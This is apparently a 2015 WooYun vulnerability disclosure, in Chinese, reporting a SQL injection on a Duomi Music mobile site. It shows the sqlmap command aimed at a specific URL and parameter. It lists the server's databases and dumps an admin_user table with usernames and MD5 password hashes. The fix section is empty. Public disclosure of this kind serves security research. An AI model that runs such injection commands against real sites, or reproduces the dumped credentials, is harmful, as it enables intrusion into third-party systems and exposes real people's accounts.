当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134398

漏洞标题:多米音乐某站SQL注入

相关厂商:多米音乐

漏洞作者: 路人甲

提交时间:2015-08-16 16:47

修复时间:2015-09-30 16:48

公开时间:2015-09-30 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

多米音乐SQL注入

详细说明:

[root@Hacker~]# Sqlmap -u "http://m.duomi.com/down/model_list.php?brand_id=14&fi
rst_char=I" -p first_char


available databases [18]:
[*] CAPTCHA
[*] db_action_kxt
[*] db_brush
[*] db_config
[*] db_gzb
[*] db_music
[*] db_search
[*] db_tag
[*] db_wap
[*] db_wap2
[*] db_wap_kxt
[*] GatewayBasic
[*] GatewayFee
[*] information_schema
[*] mysql
[*] test
[*] UDB
[*] wordpress

漏洞证明:

12.png


current user:    'kxt@%'


current database:    'db_wap2'


Database: db_wap2
Table: admin_user
[8 entries]
+----------------------------------+-----------+
| password                         | user_name |
+----------------------------------+-----------+
| 96e79218965eb72c92a549dd5a330112 | yangyang  |
| 1a145a23d6e47aadfe2063f1f951e691 | admin     |
| 48b09ff74e2e91abde6173c36cb94097 | yanbin    |
| b6dabfb7aeeda0c61047e85a1e188c58 | joey.zhou |
| 96e79218965eb72c92a549dd5a330112 | hanjun    |
| 4a823149ba7b6bd394f807caac9eb1b2 | samli     |
+----------------------------------+-----------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)